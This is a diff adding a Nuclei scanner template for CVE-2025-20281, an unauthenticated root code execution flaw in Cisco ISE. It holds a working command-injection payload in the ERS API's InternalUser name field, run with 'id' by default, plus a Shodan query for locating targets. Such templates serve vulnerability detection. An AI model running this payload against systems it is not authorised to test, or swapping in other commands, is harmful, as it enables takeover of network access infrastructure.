Create CVE-2025-20281.yaml

http/cves/2025/CVE-2025-20281.yaml

@@ -0,0 +1,55 @@
+id: CVE-2025-20281
+
+info:
+  name: Cisco ISE/ISE-PIC - Unauthenticated Remote Code Execution
+  author: pussycat0x
+  severity: critical
+  description: |
+    Cisco ISE and Cisco ISE-PIC contain a remote code execution vulnerability caused by insufficient validation of user-supplied input in a specific API, allowing unauthenticated remote attackers to execute arbitrary code as root.
+  reference:
+    - https://github.com/abrewer251/CVE-2025-20281-2-Cisco-ISE-RCE
+    - https://github.com/grupooruss/CVE-2025-20281-Cisco
+metadata:
+    shodan-query: html:"Identity Services Engine"
+  tags: cve,cve2025,cisco,ise,rce,unauth
+
+variables:
+  cmd: "id"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /admin/login.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        internal: true
+        dsl:
+          - status_code == 200 && contains(body, "document.title =\'Identity Services Engine\';")
+          - status_code == 403 && contains(body, "<title>Identity Services Engine</title>")
+
+  - raw:
+      - |
+        POST /ers/sdk#_ HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        Content-Type: application/json
+        Connection: close
+
+        {
+        "InternalUser": {
+        "name": "pwn; {{cmd}}; #",
+        "password": "x",
+        "changePassword": false
+        }
+        }
+
+    matchers:
+      - type: dsl
+        dsl:
+          - regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)
+          - status_code == 200
+        condition: and